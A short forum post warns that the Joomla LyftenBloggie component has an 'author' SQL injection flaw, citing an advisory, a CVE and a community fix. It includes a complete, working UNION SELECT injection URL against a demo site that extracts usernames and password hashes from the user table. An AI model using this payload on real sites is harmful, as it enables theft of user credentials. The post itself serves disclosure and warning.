Been searching for the demo site and found that lyftenbloggie is vulnerable for "author" sql injection as posted in secunia website: http://secunia.com/advisories/37499/. This allows hackers to steal your users name and password using lyftenbloggie.

Copy and paste the following code in your browser for a demo:

http://demo.lyften.com/index.php?option=com_lyftenbloggie&author;=62+union+select+1,concat_ws(0x3a,username,password),1,1,@@version,666,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+jos_users-- 

LyftenBloggie is a great and a promising component and hope lyften.com could fix it soon.

The complete detail of the vulnerability can be found at  http://www.packetstormsecurity.org/0911-exploits/lyften-sql.txt

I think I got hacked this way.

Thankfully web developer Jeff Channell has posted a fix until a patch becomes available:

http://jeffchannell.com/Joomla/lyften-bloggie-sql-injection-fix.html

Details on the exploit are here: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4104

You can use the NIST feed for Joomla and pump it into your admin backend, feed reader client, or a feedburner mailing list.  

Is Lyftenbloggie in active development? If there is no response to this exploit from the dev, bad sign.